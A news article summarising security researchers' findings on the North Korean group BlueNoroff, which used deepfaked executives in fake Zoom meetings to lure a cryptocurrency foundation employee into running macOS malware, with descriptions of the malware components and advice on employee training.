Rising Cyber Threats: North Korea’s BlueNoroff and its Deceptive Tactics

Introduction to BlueNoroff

BlueNoroff, a threat actor linked to North Korea, is making headlines for its innovative approach to cyberattacks. Recently, this group has been observed targeting employees in the Web3 sector, particularly focusing on cryptocurrency foundations. What’s alarming is the use of deepfake technology to mimic familiar company executives, aiming to install malware on unsuspecting victims’ Apple macOS devices.

The Attack Unfolds

According to researchers from Huntress, the attack began when an unnamed employee from a cryptocurrency foundation received a message via Telegram from an external contact. The contact solicited a conversation and provided a Calendly link to arrange a meeting. However, this link redirected the victim to a counterfeit Zoom domain controlled by BlueNoroff.

The Zoom Meeting Deception

After several weeks of communication, the targeted employee joined a group Zoom meeting, where they encountered deepfakes representing senior executives from their organization. During the session, when the employee reported issues with their microphone, the synthetic personalities suggested downloading a Zoom extension to solve the problem. This led to the download of an AppleScript named "zoom_sdk_support.scpt" via Telegram.

How the Malware Works

Upon execution, the AppleScript initially directed the employee to a legitimate Zoom webpage but also quietly retrieved a second-stage payload from a remote server. This payload was designed to execute a shell script that first disabled bash history logging. It then assessed whether Rosetta 2 was installed on the compromised Mac. Rosetta 2 is essential for enabling Macs with Apple silicon to run applications intended for Intel-based Macs.

Stealthy Installation Tactics

The script subsequently created a hidden file titled ".pwd" and retrieved a binary from the malicious Zoom page, utilizing it to download additional payloads. This included a Go-based backdoor known as Root Troy V4, which could execute remote commands and carry out more extensive malware deployments.

Notable Malicious Components

During Huntress’s investigation, they uncovered eight distinct binaries on the compromised device:

• Telegram 2: A Nim-based binary that initiates the primary backdoor.
• Root Troy V4: A Go language backdoor designed for executing AppleScript commands and stealthily managing remote instructions.
• InjectWithDyld: A C++ binary loader that drops additional payloads, allowing the perpetrator to control the infected system asynchronously.
• XScreen: An Objective-C keylogger that captures keystrokes and clipboard content, relaying this information to a command-and-control server.
• CryptoBot: A Go-based tool to extract cryptocurrency-related files from the targeted system.
• NetChk: Primarily an empty binary, it’s designed to generate random numbers indefinitely.

The Identity of BlueNoroff

BlueNoroff has been known by several aliases, including APT38 and TraderTraitor, and is a subgroup of the Lazarus Group, infamous for numerous cyber heists targeting financial institutions and cryptocurrency firms to fund North Korea’s economy. Their operations include high-profile incidents like the hacks of Bybit in February 2025 and Axie Infinity in March 2022.

Training Employees Against Attacks

Huntress emphasizes that remote workers are particularly susceptible to attacks by groups like BlueNoroff. It’s crucial for organizations, especially those in high-risk industries, to train their employees on recognizing social engineering tactics related to virtual meeting software.

The Larger Cyber Landscape

Assessments by cybersecurity analysts indicate that APT38 may no longer exist as it once did, having fragmented into new subdivisions like TraderTraitor and CryptoCore, focusing solely on financial theft. TraderTraitor has emerged as a leading threat in the realm of cryptocurrency heists, leveraging previous expertise from APT38 operations.

Evolving Tactics

Interestingly, the deceptive audio-related themes employed by BlueNoroff have parallels with another North Korean campaign known as Contagious Interview. This initiative utilizes fake job postings to trick applicants into running malicious scripts on the pretext of resolving camera and microphone access issues.

Cybersecurity experts note that newer variants of these attacks utilize Python-based scripts targeting Windows systems while maintaining a Golang variant for macOS. This trend highlights a significant evolution in cross-platform cyber threats.

Conclusion

The tactics employed by BlueNoroff represent a growing and sophisticated threat within the cybersecurity landscape. As the group continues to innovate in their methods, organizations, particularly in the cryptocurrency and tech sectors, must remain vigilant and proactive in their cybersecurity strategies.